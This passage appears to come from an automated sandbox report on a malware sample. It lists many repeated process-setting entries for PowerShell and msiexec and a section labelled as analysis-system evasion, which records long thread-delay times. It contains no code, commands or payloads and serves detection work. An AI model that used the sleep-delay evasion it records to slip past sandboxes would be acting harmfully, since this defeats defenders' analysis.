Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 600000			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599890			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599769			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599641			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599531			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599418			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599297			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599188			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 599063			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598937			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598828			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598719			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598609			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598500			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598391			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598266			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598141			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 598032			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597907			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597782			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597672			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597563			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597438			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597313			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597188			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 597075			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Thread delayed: delay time: 596953			Jump to behavior
